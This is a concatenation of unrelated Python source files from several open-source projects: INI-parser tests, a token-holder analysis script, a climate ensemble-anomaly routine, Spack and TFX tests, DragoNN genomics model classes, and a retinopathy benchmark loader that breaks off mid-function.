assert config['section']['value'] == '1'
def test_section_iter():
config = IniConfig("x", data='[section]\nvalue=1')
names = list(config['section'])
assert names == ['value']
items = list(config['section'].items())
assert items == [('value', '1')]
def test_config_iter():
config = IniConfig("x.ini", data=dedent('''
[section1]
value=1
[section2]
value=2
'''))
l = list(config)
assert len(l) == 2
assert l[0].name == 'section1'
assert l[0]['value'] == '1'
assert l[1].name == 'section2'
assert l[1]['value'] == '2'
def test_config_contains():
config = IniConfig("x.ini", data=dedent('''
[section1]
value=1
[section2]
value=2
'''))
assert 'xyz' not in config
assert 'section1' in config
assert 'section2' in config
def test_iter_file_order():
config = IniConfig("x.ini", data="""
[section2] #cpython dict ordered before section
value = 1
value2 = 2 # dict ordered before value
[section]
a = 1
b = 2
""")
l = list(config)
secnames = [x.name for x in l]
assert secnames == ['section2', 'section']
assert list(config['section2']) == ['value', 'value2']
assert list(config['section']) == ['a', 'b']
def test_example_pypirc():
config = IniConfig("pypirc", data=dedent('''
[distutils]
index-servers =
pypi
other
[pypi]
repository: <repository-url>
username: <username>
password: <password>
[other]
repository: http://example.com/pypi
username: <username>
password: <password>
'''))
distutils, pypi, other = list(config)
assert distutils["index-servers"] == "pypi\nother"
assert pypi['repository'] == '<repository-url>'
assert pypi['username'] == '<username>'
assert pypi['password'] == '<password>'
assert ['repository', 'username', 'password'] == list(other)
def test_api_import():
assert ALL == ['IniConfig', 'ParseError']
@pytest.mark.parametrize("line", [
"#qwe",
" #qwe",
";qwe",
" ;qwe",
])
def test_iscommentline_true(line):
assert iscommentline(line)
|
analysis/calculate_holding_amount.py | hao44le/ico_top_holder_analysis | 538 | 8297 | import sys
sys.path.insert(0,'..')
from data.whale_data import exchnage_accounts
from data.html_helper import check_if_address_name_exists
from data.whale_eth_tx_data import *
from data.whale_token_tx_data import identify_investor_type_token
holding_account = "holding_account"
deposit_account = 'deposit_account'
withdraw_account = "withdraw_account"
in_type = "IN"
out_type = "OUT"
all_acc_types = dict()
for acc in exchnage_accounts:
all_acc_types[acc] = exchange_type
def update_y_array(X,y,timestamp,amount):
target_index = 0
for i in range(len(X)):
x_time = X[i]
if timestamp < x_time:
target_index = i
break
for i in range(target_index,len(y)):
y[i] += amount
return y
def perform_bfs_on_accounts(out_txs,top_holder_type,acc,m_type='OUT'):
print("\t"+m_type)
unique_out = set()
for out in out_txs:
unique_out.add(out[3])
unique_out = list(unique_out)[:5]
for out in unique_out:
print("\t"+out)
if out not in all_acc_types:
investor_type = identify_investor_type(out)
if investor_type == affliate_type:
investor_type = identify_investor_type_token(out)
print("\t\t{}".format(investor_type))
else:
investor_type = all_acc_types[out]
if investor_type == exchange_type:
top_holder_type[acc] = deposit_account if m_type == "OUT" else withdraw_account
all_acc_types[out] = investor_type
if acc not in top_holder_type:
top_holder_type[acc] = holding_account
return top_holder_type
def calculate_holding_amount(X,escape_accounts,txs):
top_holder_type = dict()
for acc in txs:
tx = txs[acc]
if acc in escape_accounts:
continue
#如果当前账户从来没有向外打过token,ignore
out_txs = [item for item in tx if item[2] == 'OUT']
if len(out_txs) == 0:
print("\tholding account")
top_holder_type[acc] = holding_account
continue
# build all traxe Y: holding_amount, deposit_amount, withdraw_amount
amount_trace_y = [0] * len(X)
for holder in txs:
if holder in escape_accounts:
continue
if holder not in top_holder_type:
print("{} not identified! ".format(holder))
continue
holder_type = top_holder_type[holder]
holder_txs = txs[holder]
print("{} {}".format(holder,holder_type))
for tx in holder_txs:
[timestamp,from_a,tx_type,to_a,amount] = tx
if holder_type == holding_account:
if tx_type == in_type:
amount_trace_y = update_y_array(X,amount_trace_y,timestamp,amount)
else:
amount_trace_y = update_y_array(X,amount_trace_y,timestamp,-amount)
return amount_trace_y
|
esmvaltool/diag_scripts/ensclus/ens_anom.py | yifatdzigan/ESMValTool | 148 | 8321 | """Computation of ensemble anomalies based on a desired value."""
import os
import numpy as np
from scipy import stats
# User-defined packages
from read_netcdf import read_iris, save_n_2d_fields
from sel_season_area import sel_area, sel_season
def ens_anom(filenames, dir_output, name_outputs, varname, numens, season,
area, extreme):
"""Ensemble anomalies.
Computation of the ensemble anomalies based on the desired value
from the input variable (it can be the percentile, mean, maximum, standard
deviation or trend)
OUTPUT: NetCDF files of ensemble mean of climatology, selected value and
anomaly maps.
"""
print('The name of the output files will be <variable>_{0}.txt'
.format(name_outputs))
print('Number of ensemble members: {0}'.format(numens))
outfiles = []
# Reading the netCDF file of 3Dfield, for all the ensemble members
var_ens = []
for ens in range(numens):
ifile = filenames[ens]
# print('ENSEMBLE MEMBER %s' %ens)
var, varunits, lat, lon, dates, _ = read_iris(ifile)
# Convertion from kg m-2 s-1 to mm/day
if varunits == 'kg m-2 s-1':
var = var * 86400 # there are 86400 seconds in a day
varunits = 'mm/day'
# Selecting a season (DJF,DJFM,NDJFM,JJA)
var_season, _ = sel_season(var, dates, season)
# Selecting only [latS-latN, lonW-lonE] box region
var_area, lat_area, lon_area = sel_area(lat, lon, var_season, area)
var_ens.append(var_area)
if varunits == 'kg m-2 s-1':
print('\nPrecipitation rate units were converted from kg m-2 s-1 '
'to mm/day')
print('The variable is {0} ({1})'.format(varname, varunits))
print('Original var shape: (time x lat x lon)={0}'.format(var.shape))
print('var shape after selecting season {0} and area {1}: '
'(time x lat x lon)={2}'.format(season, area, var_area.shape))
if extreme == 'mean':
# Compute the time mean over the entire period, for each ens member
varextreme_ens = [np.nanmean(var_ens[i], axis=0)
for i in range(numens)]
elif len(extreme.split("_")) == 2:
# Compute the chosen percentile over the period, for each ens member
quant = int(extreme.partition("th")[0])
varextreme_ens = [np.nanpercentile(var_ens[i], quant, axis=0)
for i in range(numens)]
elif extreme == 'maximum':
# Compute the maximum value over the period, for each ensemble member
varextreme_ens = [np.nanmax(var_ens[i], axis=0) for i in range(numens)]
elif extreme == 'std':
# Compute the standard deviation over the period, for each ens member
varextreme_ens = [np.nanstd(var_ens[i], axis=0) for i in range(numens)]
elif extreme == 'trend':
# Compute the linear trend over the period, for each ensemble member
trendmap = np.empty((var_ens[0].shape[1], var_ens[0].shape[2]))
trendmap_ens = []
for i in range(numens):
for jla in range(var_ens[0].shape[1]):
for jlo in range(var_ens[0].shape[2]):
slope, _, _, _, _ = \
stats.linregress(range(var_ens[0].shape[0]),
var_ens[i][:, jla, jlo])
trendmap[jla, jlo] = slope
trendmap_ens.append(trendmap.copy())
varextreme_ens = trendmap_ens
varextreme_ens_np = np.array(varextreme_ens)
print('Anomalies are computed with respect to the {0}'.format(extreme))
# Compute and save the anomalies with respect to the ensemble
ens_anomalies = varextreme_ens_np - np.nanmean(varextreme_ens_np, axis=0)
varsave = 'ens_anomalies'
ofile = os.path.join(dir_output, 'ens_anomalies_{0}.nc'
.format(name_outputs))
# print(ofile)
print('ens_anomalies shape: (numens x lat x lon)={0}'
.format(ens_anomalies.shape))
save_n_2d_fields(lat_area, lon_area, ens_anomalies, varsave,
varunits, ofile)
outfiles.append(ofile)
# Compute and save the climatology
vartimemean_ens = [np.mean(var_ens[i], axis=0) for i in range(numens)]
ens_climatologies = np.array(vartimemean_ens)
varsave = 'ens_climatologies'
ofile = os.path.join(dir_output, 'ens_climatologies_{0}.nc'
.format(name_outputs))
save_n_2d_fields(lat_area, lon_area, ens_climatologies, varsave,
varunits, ofile)
outfiles.append(ofile)
ens_extreme = varextreme_ens_np
varsave = 'ens_extreme'
ofile = os.path.join(dir_output, 'ens_extreme_{0}.nc'.format(name_outputs))
save_n_2d_fields(lat_area, lon_area, ens_extreme, varsave,
varunits, ofile)
outfiles.append(ofile)
return outfiles
|
lib/spack/spack/test/cache_fetch.py | LiamBindle/spack | 2,360 | 8325 | # Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import os
import pytest
from llnl.util.filesystem import mkdirp, touch
import spack.config
from spack.fetch_strategy import CacheURLFetchStrategy, NoCacheError
from spack.stage import Stage
@pytest.mark.parametrize('_fetch_method', ['curl', 'urllib'])
def test_fetch_missing_cache(tmpdir, _fetch_method):
"""Ensure raise a missing cache file."""
testpath = str(tmpdir)
with spack.config.override('config:url_fetch_method', _fetch_method):
fetcher = CacheURLFetchStrategy(url='file:///not-a-real-cache-file')
with Stage(fetcher, path=testpath):
with pytest.raises(NoCacheError, match=r'No cache'):
fetcher.fetch()
@pytest.mark.parametrize('_fetch_method', ['curl', 'urllib'])
def test_fetch(tmpdir, _fetch_method):
"""Ensure a fetch after expanding is effectively a no-op."""
testpath = str(tmpdir)
cache = os.path.join(testpath, 'cache.tar.gz')
touch(cache)
url = 'file:///{0}'.format(cache)
with spack.config.override('config:url_fetch_method', _fetch_method):
fetcher = CacheURLFetchStrategy(url=url)
with Stage(fetcher, path=testpath) as stage:
source_path = stage.source_path
mkdirp(source_path)
fetcher.fetch()
|
tfx/orchestration/experimental/core/service_jobs_test.py | BACtaki/tfx | 1,813 | 8349 | # Copyright 2021 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for tfx.orchestration.experimental.core.service_jobs."""
from absl.testing.absltest import mock
import tensorflow as tf
from tfx.orchestration.experimental.core import service_jobs
from tfx.orchestration.experimental.core import test_utils
class ExceptionHandlingServiceJobManagerWrapperTest(test_utils.TfxTest):
def setUp(self):
super().setUp()
self._mock_service_job_manager = mock.create_autospec(
service_jobs.ServiceJobManager, instance=True)
self._mock_service_job_manager.ensure_node_services.return_value = (
service_jobs.ServiceStatus.SUCCESS)
self._mock_service_job_manager.stop_node_services.return_value = True
self._mock_service_job_manager.is_pure_service_node.return_value = True
self._mock_service_job_manager.is_mixed_service_node.return_value = False
self._wrapper = service_jobs.ExceptionHandlingServiceJobManagerWrapper(
self._mock_service_job_manager)
def test_calls_forwarded_to_underlying_instance(self):
self.assertEqual(service_jobs.ServiceStatus.SUCCESS,
self._wrapper.ensure_node_services(mock.Mock(), 'node1'))
self.assertTrue(self._wrapper.stop_node_services(mock.Mock(), 'node2'))
self.assertTrue(self._wrapper.is_pure_service_node(mock.Mock(), 'node3'))
self.assertFalse(self._wrapper.is_mixed_service_node(mock.Mock(), 'node4'))
self._mock_service_job_manager.ensure_node_services.assert_called_once_with(
mock.ANY, 'node1')
self._mock_service_job_manager.stop_node_services.assert_called_once_with(
mock.ANY, 'node2')
self._mock_service_job_manager.is_pure_service_node.assert_called_once_with(
mock.ANY, 'node3')
self._mock_service_job_manager.is_mixed_service_node.assert_called_once_with(
mock.ANY, 'node4')
def test_ensure_node_services_exception_handling(self):
self._mock_service_job_manager.ensure_node_services.side_effect = RuntimeError(
'test error')
self.assertEqual(service_jobs.ServiceStatus.FAILED,
self._wrapper.ensure_node_services(mock.Mock(), 'node1'))
self._mock_service_job_manager.ensure_node_services.assert_called_once_with(
mock.ANY, 'node1')
def test_stop_node_services_exception_handling(self):
self._mock_service_job_manager.stop_node_services.side_effect = RuntimeError(
'test error')
self.assertFalse(self._wrapper.stop_node_services(mock.Mock(), 'node2'))
self._mock_service_job_manager.stop_node_services.assert_called_once_with(
mock.ANY, 'node2')
if __name__ == '__main__':
tf.test.main()
|
dragonn/models.py | kundajelab/dragonn | 251 | 8350 | <gh_stars>100-1000
from __future__ import absolute_import, division, print_function
import matplotlib
import numpy as np
import os
import subprocess
import sys
import tempfile
matplotlib.use('pdf')
import matplotlib.pyplot as plt
from abc import abstractmethod, ABCMeta
from dragonn.metrics import ClassificationResult
from sklearn.svm import SVC as scikit_SVC
from sklearn.tree import DecisionTreeClassifier as scikit_DecisionTree
from sklearn.ensemble import RandomForestClassifier
from keras.models import load_model
from dragonn.runtime_metrics import *
from dragonn.custom_losses import *
import warnings
warnings.filterwarnings('ignore')
def load_dragonn_model(model_string):
custom_objects={"recall":recall,
"sensitivity":recall,
"specificity":specificity,
"fpr":fpr,
"fnr":fnr,
"fdr":fdr,
"precision":precision,
"f1":f1,
"spearman_corr":spearman_corr,
"ambig_binary_crossentropy":ambig_binary_crossentropy,
"ambig_mean_squared_error":ambig_mean_squared_error}
model=load_model(model_string,custom_objects=custom_objects)
return model
class Model(object):
__metaclass__ = ABCMeta
@abstractmethod
def __init__(self, **hyperparameters):
pass
@abstractmethod
def train(self, X, y, validation_data):
pass
@abstractmethod
def predict(self, X):
pass
def test(self, X, y):
return ClassificationResult(y, self.predict(X))
def score(self, X, y, metric):
return self.test(X, y)[metric]
class SequenceDNN(Model):
"""
Sequence DNN models.
Parameters
----------
seq_length : int, optional
length of input sequence.
keras_model : instance of keras.models.Sequential, optional
seq_length or keras_model must be specified.
num_tasks : int, optional
number of tasks. Default: 1.
num_filters : list[int] | tuple[int]
number of convolutional filters in each layer. Default: (15,).
conv_width : list[int] | tuple[int]
width of each layer's convolutional filters. Default: (15,).
pool_width : int
width of max pooling after the last layer. Default: 35.
L1 : float
strength of L1 penalty.
dropout : float
dropout probability in every convolutional layer. Default: 0.
verbose: int
Verbosity level during training. Valida values: 0, 1, 2.
Returns
-------
Compiled DNN model.
"""
def __init__(self, seq_length=None, keras_model=None,
use_RNN=False, num_tasks=1,
num_filters=(15, 15, 15), conv_width=(15, 15, 15),
pool_width=35, GRU_size=35, TDD_size=15,
L1=0, dropout=0.0, num_epochs=100, verbose=1):
from keras.models import Sequential
from keras.layers.core import (
Activation, Dense, Dropout, Flatten,
Permute, Reshape
)
from keras.layers.convolutional import Convolution2D, MaxPooling2D
from keras.layers.recurrent import GRU
from keras.regularizers import l1
self.num_tasks = num_tasks
self.num_epochs = num_epochs
self.verbose = verbose
self.train_metrics = []
self.valid_metrics = []
if keras_model is not None and seq_length is None:
self.model = keras_model
self.num_tasks = keras_model.layers[-1].output_shape[-1]
elif seq_length is not None and keras_model is None:
self.model = Sequential()
assert len(num_filters) == len(conv_width)
for i, (nb_filter, nb_col) in enumerate(zip(num_filters, conv_width)):
conv_height = 4 if i == 0 else 1
self.model.add(Convolution2D(
nb_filter=nb_filter, nb_row=conv_height,
nb_col=nb_col, activation='linear',
init='he_normal', input_shape=(1, 4, seq_length),
W_regularizer=l1(L1), b_regularizer=l1(L1)))
self.model.add(Activation('relu'))
self.model.add(Dropout(dropout))
self.model.add(MaxPooling2D(pool_size=(1, pool_width)))
if use_RNN:
num_max_pool_outputs = self.model.layers[-1].output_shape[-1]
self.model.add(Reshape((num_filters[-1], num_max_pool_outputs)))
self.model.add(Permute((2, 1)))
self.model.add(GRU(GRU_size, return_sequences=True))
self.model.add(TimeDistributedDense(TDD_size, activation='relu'))
self.model.add(Flatten())
self.model.add(Dense(output_dim=self.num_tasks))
self.model.add(Activation('sigmoid'))
self.model.compile(optimizer='adam', loss='binary_crossentropy')
else:
raise ValueError("Exactly one of seq_length or keras_model must be specified!")
def train(self, X, y, validation_data, early_stopping_metric='Loss',
early_stopping_patience=5, save_best_model_to_prefix=None):
if y.dtype != bool:
assert set(np.unique(y)) == {0, 1}
y = y.astype(bool)
multitask = y.shape[1] > 1
if not multitask:
num_positives = y.sum()
num_sequences = len(y)
num_negatives = num_sequences - num_positives
if self.verbose >= 1:
print('Training model (* indicates new best result)...')
X_valid, y_valid = validation_data
early_stopping_wait = 0
best_metric = np.inf if early_stopping_metric == 'Loss' else -np.inf
for epoch in range(1, self.num_epochs + 1):
self.model.fit(X, y, batch_size=128, nb_epoch=1,
class_weight={True: num_sequences / num_positives,
False: num_sequences / num_negatives}
if not multitask else None, verbose=self.verbose >= 2)
epoch_train_metrics = self.test(X, y)
epoch_valid_metrics = self.test(X_valid, y_valid)
self.train_metrics.append(epoch_train_metrics)
self.valid_metrics.append(epoch_valid_metrics)
if self.verbose >= 1:
print('Epoch {}:'.format(epoch))
print('Train {}'.format(epoch_train_metrics))
print('Valid {}'.format(epoch_valid_metrics), end='')
current_metric = epoch_valid_metrics[early_stopping_metric].mean()
if (early_stopping_metric == 'Loss') == (current_metric <= best_metric):
if self.verbose >= 1:
print(' *')
best_metric = current_metric
best_epoch = epoch
early_stopping_wait = 0
if save_best_model_to_prefix is not None:
self.save(save_best_model_to_prefix)
else:
if self.verbose >= 1:
print()
if early_stopping_wait >= early_stopping_patience:
break
early_stopping_wait += 1
if self.verbose >= 1:
print('Finished training after {} epochs.'.format(epoch))
if save_best_model_to_prefix is not None:
print("The best model's architecture and weights (from epoch {0}) "
'were saved to {1}.arch.json and {1}.weights.h5'.format(
best_epoch, save_best_model_to_prefix))
def predict(self, X):
return self.model.predict(X, batch_size=128, verbose=False)
def get_sequence_filters(self):
"""
Returns 3D array of 2D sequence filters.
"""
return self.model.layers[0].get_weights()[0].squeeze(axis=1)
@staticmethod
def _plot_scores(X, output_directory, peak_width, score_func, score_name):
from dragonn.plot import plot_bases_on_ax
scores = score_func(X).squeeze(axis=2) # (num_task, num_samples, num_bases, sequence_length)
try:
os.makedirs(output_directory)
except OSError:
pass
num_tasks = len(scores)
for task_index, task_scores in enumerate(scores):
for sequence_index, sequence_scores in enumerate(task_scores):
# sequence_scores is num_bases x sequence_length
basewise_max_sequence_scores = sequence_scores.max(axis=0)
plt.clf()
figure, (top_axis, bottom_axis) = plt.subplots(2)
top_axis.plot(range(1, len(basewise_max_sequence_scores) + 1),
basewise_max_sequence_scores)
top_axis.set_title('{} scores (motif highlighted)'.format(score_name))
peak_position = basewise_max_sequence_scores.argmax()
top_axis.axvspan(peak_position - peak_width, peak_position + peak_width,
color='grey', alpha=0.1)
peak_sequence_scores = sequence_scores[:, peak_position - peak_width :
peak_position + peak_width].T
# Set non-max letter_heights to zero
letter_heights = np.zeros_like(peak_sequence_scores)
letter_heights[np.arange(len(letter_heights)),
peak_sequence_scores.argmax(axis=1)] = \
basewise_max_sequence_scores[peak_position - peak_width :
peak_position + peak_width]
plot_bases_on_ax(letter_heights, bottom_axis)
bottom_axis.set_xticklabels(tuple(map(
str, np.arange(peak_position - peak_width, peak_position + peak_width + 1))))
bottom_axis.tick_params(axis='x', labelsize='small')
plt.xlabel('Position')
plt.ylabel('Score')
plt.savefig(os.path.join(output_directory, 'sequence_{}{}'.format(
sequence_index, '_task_{}'.format(task_index) if num_tasks > 1 else '')))
plt.close()
def plot_deeplift(self, X, output_directory, peak_width=10):
self._plot_scores(X, output_directory, peak_width,
score_func=self.deeplift, score_name='DeepLift')
def plot_in_silico_mutagenesis(self, X, output_directory, peak_width=10):
self._plot_scores(X, output_directory, peak_width,
score_func=self.in_silico_mutagenesis, score_name='ISM')
def plot_architecture(self, output_file):
from dragonn.visualize_util import plot as plot_keras_model
plot_keras_model(self.model, output_file, show_shape=True)
def save(self, save_best_model_to_prefix):
arch_fname = save_best_model_to_prefix + '.arch.json'
weights_fname = save_best_model_to_prefix + '.weights.h5'
open(arch_fname, 'w').write(self.model.to_json())
self.model.save_weights(weights_fname, overwrite=True)
@staticmethod
def load(model_hdf5_fname=None, arch_fname=None, weights_fname=None):
if model_hdf5_fname!=None:
from keras.models import load_model
sequence_dnn=SequenceDNN(keras_model=load_model(model_hdf5_fname))
else:
from keras.models import model_from_json
model_json_string = open(arch_fname).read()
sequence_dnn = SequenceDNN(keras_model=model_from_json(model_json_string))
if weights_fname is not None:
sequence_dnn.model.load_weights(weights_fname)
return sequence_dnn
class MotifScoreRNN(Model):
def __init__(self, input_shape, gru_size=10, tdd_size=4):
from keras.models import Sequential
from keras.layers.core import (
Activation, Dense, Flatten, TimeDistributedDense
)
from keras.layers.recurrent import GRU
self.model = Sequential()
self.model.add(GRU(gru_size, return_sequences=True,
input_shape=input_shape))
if tdd_size is not None:
self.model.add(TimeDistributedDense(tdd_size))
self.model.add(Flatten())
self.model.add(Dense(1))
self.model.add(Activation('sigmoid'))
print('Compiling model...')
self.model.compile(optimizer='adam', loss='binary_crossentropy')
def train(self, X, y, validation_data):
from keras.callbacks import EarlyStopping
print('Training model...')
multitask = y.shape[1] > 1
if not multitask:
num_positives = y.sum()
num_sequences = len(y)
num_negatives = num_sequences - num_positives
self.model.fit(
X, y, batch_size=128, nb_epoch=100,
validation_data=validation_data,
class_weight={True: num_sequences / num_positives,
False: num_sequences / num_negatives}
if not multitask else None,
callbacks=[EarlyStopping(monitor='val_loss', patience=10)],
verbose=True)
def predict(self, X):
return self.model.predict(X, batch_size=128, verbose=False)
class gkmSVM(Model):
def __init__(self, prefix='./gkmSVM', word_length=11, mismatches=3, C=1,
threads=1, cache_memory=100, verbosity=4):
self.word_length = word_length
self.mismatches = mismatches
self.C = C
self.threads = threads
self.prefix = '_'.join(map(str, (prefix, word_length, mismatches, C)))
options_list = zip(
['-l', '-d', '-c', '-T', '-m', '-v'],
map(str, (word_length, mismatches, C, threads, cache_memory, verbosity)))
self.options = ' '.join([' '.join(option) for option in options_list])
@property
def model_file(self):
model_fname = '{}.model.txt'.format(self.prefix)
return model_fname if os.path.isfile(model_fname) else None
@staticmethod
def encode_sequence_into_fasta_file(sequence_iterator, ofname):
"""writes sequences into fasta file
"""
with open(ofname, "w") as wf:
for i, seq in enumerate(sequence_iterator):
print('>{}'.format(i), file=wf)
print(seq, file=wf)
def train(self, X, y, validation_data=None):
"""
Trains gkm-svm, saves model file.
"""
y = y.squeeze()
pos_sequence = X[y]
neg_sequence = X[~y]
pos_fname = "%s.pos_seq.fa" % self.prefix
neg_fname = "%s.neg_seq.fa" % self.prefix
# create temporary fasta files
self.encode_sequence_into_fasta_file(pos_sequence, pos_fname)
self.encode_sequence_into_fasta_file(neg_sequence, neg_fname)
# run command
command = ' '.join(
('gkmtrain', self.options, pos_fname, neg_fname, self.prefix))
process = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True)
process.wait() # wait for it to finish
# remove fasta files
os.system("rm %s" % pos_fname)
os.system("rm %s" % neg_fname)
def predict(self, X):
if self.model_file is None:
raise RuntimeError("GkmSvm hasn't been trained!")
# write test fasta file
test_fname = "%s.test.fa" % self.prefix
self.encode_sequence_into_fasta_file(X, test_fname)
# test gkmsvm
temp_ofp = tempfile.NamedTemporaryFile()
threads_option = '-T %s' % (str(self.threads))
command = ' '.join(['gkmpredict',
test_fname,
self.model_file,
temp_ofp.name,
threads_option])
process = subprocess.Popen(command, shell=True)
process.wait() # wait for it to finish
os.system("rm %s" % test_fname) # remove fasta file
# get classification results
temp_ofp.seek(0)
y = np.array([line.split()[-1] for line in temp_ofp], dtype=float)
temp_ofp.close()
return np.expand_dims(y, 1)
class SVC(Model):
def __init__(self):
self.classifier = scikit_SVC(probability=True, kernel='linear')
def train(self, X, y, validation_data=None):
self.classifier.fit(X, y)
def predict(self, X):
return self.classifier.predict_proba(X)[:, 1:]
class DecisionTree(Model):
def __init__(self):
self.classifier = scikit_DecisionTree()
def train(self, X, y, validation_data=None):
self.classifier.fit(X, y)
def predict(self, X):
predictions = np.asarray(self.classifier.predict_proba(X))[..., 1]
if len(predictions.shape) == 2: # multitask
predictions = predictions.T
else: # single-task
predictions = np.expand_dims(predictions, 1)
return predictions
class RandomForest(DecisionTree):
def __init__(self):
self.classifier = RandomForestClassifier(n_estimators=100)
|
bdlb/diabetic_retinopathy_diagnosis/benchmark.py | Sairam954/bdl-benchmarks | 666 | 8364 | # Copyright 2019 BDL Benchmarks Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Diabetic retinopathy diagnosis BDL Benchmark."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
from typing import Callable
from typing import Dict
from typing import Optional
from typing import Sequence
from typing import Text
from typing import Tuple
from typing import Union
import numpy as np
import pandas as pd
import tensorflow as tf
from absl import logging
from ..core import transforms
from ..core.benchmark import Benchmark
from ..core.benchmark import BenchmarkInfo
from ..core.benchmark import DataSplits
from ..core.constants import DATA_DIR
from ..core.levels import Level
tfk = tf.keras
_DIABETIC_RETINOPATHY_DIAGNOSIS_DATA_DIR = os.path.join(
DATA_DIR, "downloads", "manual", "diabetic_retinopathy_diagnosis")
class DiabeticRetinopathyDiagnosisBecnhmark(Benchmark):
"""Diabetic retinopathy diagnosis benchmark class."""
def __init__(
self,
level: Union[Text, Level],
batch_size: int = 64,
data_dir: Optional[Text] = None,
download_and_prepare: bool = False,
):
"""Constructs a benchmark object.
Args:
level: `Level` or `str, downstream task level.
batch_size: (optional) `int`, number of datapoints
per mini-batch.
data_dir: (optional) `str`, path to parent data directory.
download_and_prepare: (optional) `bool`, if the data is not available
it downloads and preprocesses it.
"""
self.__level = level if isinstance(level, Level) else Level.from_str(level)
try:
self.__ds = self.load(level=level,
batch_size=batch_size,
data_dir=data_dir or DATA_DIR)
except AssertionError:
if not download_and_prepare:
raise
else:
logging.info(
"Data not found, `DiabeticRetinopathyDiagnosisBecnhmark.download_and_prepare()`"
" is now running...")
self.download_and_prepare()
@classmethod
def evaluate(
cls,
estimator: Callable[[np.ndarray], Tuple[np.ndarray, np.ndarray]],
dataset: tf.data.Dataset,
output_dir: Optional[Text] = None,
name: Optional[Text] = None,
) -> Dict[Text, float]:
"""Evaluates an `estimator` on the `mode` benchmark dataset.
Args:
estimator: `lambda x: mu_x, uncertainty_x`, an uncertainty estimation
function, which returns `mean_x` and predictive `uncertainty_x`.
dataset: `tf.data.Dataset`, on which dataset to performance evaluation.
output_dir: (optional) `str`, directory to save figures.
name: (optional) `str`, the name of the method.
"""
import inspect
import tqdm
import tensorflow_datasets as tfds
from sklearn.metrics import roc_auc_score
from sklearn.metrics import accuracy_score
import matplotlib.pyplot as plt
# Containers used for caching performance evaluation
y_true = list()
y_pred = list()
y_uncertainty = list()
# Convert to NumPy iterator if necessary
ds = dataset if inspect.isgenerator(dataset) else tfds.as_numpy(dataset)
for x, y in tqdm.tqdm(ds):
# Sample from probabilistic model
mean, uncertainty = estimator(x)
# Cache predictions
y_true.append(y)
y_pred.append(mean)
y_uncertainty.append(uncertainty)
# Use vectorized NumPy containers
y_true = np.concatenate(y_true).flatten()
y_pred = np.concatenate(y_pred).flatten()
y_uncertainty = np.concatenate(y_uncertainty).flatten()
fractions = np.asarray([0.5, 0.6, 0.7, 0.8, 0.9, 1.0])
# Metrics for evaluation
metrics = zip(["accuracy", "auc"], cls.metrics())
return {
metric: cls._evaluate_metric(
y_true,
y_pred,
y_uncertainty,
fractions,
lambda y_true, y_pred: metric_fn(y_true, y_pred).numpy(),
name,
) for (metric, metric_fn) in metrics
}
@staticmethod
def _evaluate_metric(
y_true: np.ndarray,
y_pred: np.ndarray,
y_uncertainty: np.ndarray,
fractions: Sequence[float],
metric_fn: Callable[[np.ndarray, np.ndarray], float],
name=None,
) -> pd.DataFrame:
"""Evaluate model predictive distribution on `metric_fn` at data retain
`fractions`.
Args:
y_true: `numpy.ndarray`, the ground truth labels, with shape [N].
y_pred: `numpy.ndarray`, the model predictions, with shape [N].
y_uncertainty: `numpy.ndarray`, the model uncertainties,
with shape [N].
fractions: `iterable`, the percentages of data to retain for
calculating `metric_fn`.
metric_fn: `lambda(y_true, y_pred) -> float`, a metric
function that provides a score given ground truths
and predictions.
name: (optional) `str`, the name of the method.
Returns:
A `pandas.DataFrame` with columns ["retained_data", "mean", "std"],
that summarizes the scores at different data retained fractions.
"""
N = y_true.shape[0]
# Sorts indexes by ascending uncertainty
I_uncertainties = np.argsort(y_uncertainty)
# Score containers
mean = np.empty_like(fractions)
# TODO(filangel): do bootstrap sampling and estimate standard error
std = np.zeros_like(fractions)
for i, frac in enumerate(fractions):
# Keep only the %-frac of lowest uncertainties
I = np.zeros(N, dtype=bool)
I[I_uncertainties[:int(N * frac)]] = True
mean[i] = metric_fn(y_true[I], y_pred[I])
# Store
df = pd.DataFrame(dict(retained_data=fractions, mean=mean, std=std))
df.name = name
return df
@property
def datasets(self) -> tf.data.Dataset:
"""Pointer to the processed datasets."""
return self.__ds
@property
def info(self) -> BenchmarkInfo:
"""Text description of the benchmark."""
return BenchmarkInfo(description="", urls="", setup="", citation="")
@property
def level(self) -> Level:
"""The downstream task level."""
return self.__level
@staticmethod
def loss() -> tfk.losses.Loss:
"""Loss used for training binary classifiers."""
return tfk.losses.BinaryCrossentropy()
@staticmethod
def metrics() -> tfk.metrics.Metric:
"""Evaluation metrics used for monitoring training."""
return [tfk.metrics.BinaryAccuracy(), tfk.metrics.AUC()]
@staticmethod
def class_weight() -> Sequence[float]:
"""Class weights used for rebalancing the dataset, by skewing the `loss`
accordingly."""
return [1.0, 4.0]
@classmethod
def load(
cls,
level: Union[Text, Level] = "realworld",
batch_size: int = 64,
data_dir: Optional[Text] = None,
as_numpy: bool = False,
) -> DataSplits:
"""Loads the datasets for the benchmark.
Args:
level: `Level` or `str, downstream task level.
batch_size: (optional) `int`, number of datapoints
per mini-batch.
data_dir: (optional) `str`, path to parent data directory.
as_numpy: (optional) `bool`, if True returns python generators
with `numpy.ndarray` outputs.
Returns:
A namedtuple with properties:
* train: `tf.data.Dataset`, train dataset.
* validation: `tf.data.Dataset`, validation dataset.
* test: `tf.data.Dataset`, test dataset.
"""
import tensorflow_datasets as tfds
from .tfds_adapter import DiabeticRetinopathyDiagnosis
# Fetch datasets
try:
ds_train, ds_validation, ds_test = DiabeticRetinopathyDiagnosis(
data_dir=data_dir or DATA_DIR,
